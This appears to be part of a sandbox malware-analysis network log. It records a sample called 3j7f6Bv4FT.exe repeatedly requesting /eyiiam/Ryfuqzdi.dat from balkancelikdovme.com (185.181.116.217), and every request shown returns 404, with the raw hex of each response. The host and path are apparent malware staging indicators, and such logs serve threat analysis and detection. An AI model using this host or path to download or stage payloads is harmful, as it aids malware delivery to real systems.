      2025-01-10 22:05:02 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      15192.168.2.449745185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:03 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:03 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:03 GMT
      vary: User-Agent
      2025-01-10 22:05:03 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      16192.168.2.449746185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:04 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:04 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:04 GMT
      vary: User-Agent
      2025-01-10 22:05:04 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      17192.168.2.449749185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:05 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:05 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:05 GMT
      vary: User-Agent
      2025-01-10 22:05:05 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      18192.168.2.449752185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:05 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:06 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:06 GMT
      vary: User-Agent
      2025-01-10 22:05:06 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      19192.168.2.449754185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:06 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:07 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:07 GMT
      vary: User-Agent
      2025-01-10 22:05:07 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      20192.168.2.449756185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:07 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:08 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:07 GMT
      vary: User-Agent
      2025-01-10 22:05:08 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      21192.168.2.449757185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:08 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:08 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:08 GMT
      vary: User-Agent
      2025-01-10 22:05:08 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      22192.168.2.449758185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:09 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:09 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:09 GMT
      vary: User-Agent
      2025-01-10 22:05:09 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      23192.168.2.449759185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:10 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:10 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:10 GMT
      vary: User-Agent
      2025-01-10 22:05:10 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      24192.168.2.449760185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:11 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:11 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:11 GMT
      vary: User-Agent
      2025-01-10 22:05:11 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      25192.168.2.449761185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:12 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:12 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:12 GMT
      vary: User-Agent
      2025-01-10 22:05:12 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      26192.168.2.449762185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:13 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:13 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:13 GMT
      vary: User-Agent
      2025-01-10 22:05:13 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      27192.168.2.449763185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:14 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:14 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:14 GMT
      vary: User-Agent
      2025-01-10 22:05:14 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      28192.168.2.449764185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:14 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:15 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:15 GMT
      vary: User-Agent
